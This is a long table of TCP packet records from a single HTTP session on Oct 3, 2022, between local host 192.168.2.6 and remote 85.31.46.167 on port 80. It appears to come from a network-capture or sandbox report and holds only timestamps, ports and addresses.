Oct 3, 2022 17:42:24.563457966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.072499037 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.072593927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.485739946 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.486388922 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.513386011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.513395071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.513446093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.513461113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.513462067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.513462067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.513530016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.513530016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.513922930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.514004946 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.514014006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.514029980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.514053106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.514069080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.514086008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.514094114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.514121056 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.514166117 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.540771008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.540796041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.540822029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.540841103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.540864944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.540888071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.540905952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.540924072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.540941954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.540941954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.540950060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541026115 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.541027069 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.541027069 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.541132927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541152000 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541179895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541203976 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541222095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541239023 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.541244030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541259050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.541264057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541282892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541299105 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.541309118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541321039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.541327953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541347027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.541351080 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.541368961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.541384935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.541405916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568489075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568526983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568557024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568576097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568602085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568645000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568645954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568645954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568645954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568645954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568706989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568734884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568758965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568772078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568784952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568798065 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568799019 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568833113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568864107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568891048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568916082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568939924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568941116 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568967104 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.568967104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.568984032 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569021940 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569047928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569060087 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569072008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569098949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569119930 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569144011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569144011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569190979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569216967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569250107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569274902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569284916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569295883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569303989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569328070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569336891 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569345951 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569386959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569406986 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569420099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569425106 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569442034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569447041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569473028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569482088 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569499016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569509029 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569525957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569528103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569551945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569567919 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569567919 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569578886 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569602966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569605112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569631100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569648027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569648027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569654942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569681883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569705963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569724083 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569724083 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569730997 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569761038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.569812059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.569830894 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597374916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597404003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597426891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597443104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597467899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597485065 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597503901 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597507954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597503901 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597526073 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597551107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597568035 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597584963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597601891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597624063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597640038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597661018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597677946 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597695112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597707033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597711086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597707033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597707033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597707033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597729921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597747087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597765923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597781897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597783089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597781897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597801924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597806931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597820044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597842932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597852945 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597862005 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597878933 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597888947 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597902060 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597908974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597925901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597937107 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597944021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597959995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597960949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597975016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.597979069 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.597995996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598007917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598012924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598026991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598031044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598051071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598099947 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598109007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598128080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598148108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598165989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598181963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598192930 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598198891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598213911 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598217010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598232985 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598234892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598253012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598256111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598275900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598278046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598295927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598299026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598313093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598330975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598347902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598357916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598364115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598376989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598382950 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598426104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598434925 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598443985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598455906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598460913 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598478079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598495007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598512888 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598553896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598613977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598639965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598655939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598671913 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598689079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598696947 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598706007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598715067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598737001 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598756075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598822117 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598839045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598855019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598871946 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598903894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598906040 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598920107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598926067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598937988 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598953962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598970890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598974943 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.598988056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.598994017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.599005938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.599015951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.599025011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.599037886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.599044085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.599061012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.599078894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.599080086 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.599097013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.599114895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.599122047 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.599132061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.599138975 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.599195004 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.599220037 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.625806093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.625845909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.625873089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.625946045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626041889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626070023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626111031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626137972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626166105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626192093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626215935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626220942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626245022 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626250029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626277924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626300097 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626303911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626329899 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626332998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626355886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626410007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626458883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626487017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626524925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626550913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626552105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626580954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626586914 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626609087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626621008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626636982 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626658916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626665115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626679897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626679897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626693010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626720905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626748085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626754045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626775026 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626791954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626804113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626811981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626832008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626858950 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626880884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626880884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626880884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626912117 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626928091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.626940012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626969099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.626996040 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627022982 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627048969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627055883 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627055883 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627055883 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627077103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627104998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627131939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627159119 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627177954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627177954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627177954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627177954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627192974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627219915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627252102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627257109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627257109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627279043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627306938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627334118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627332926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627332926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627332926 CEST	49711	80	192.168.2.6	85.31.46.167
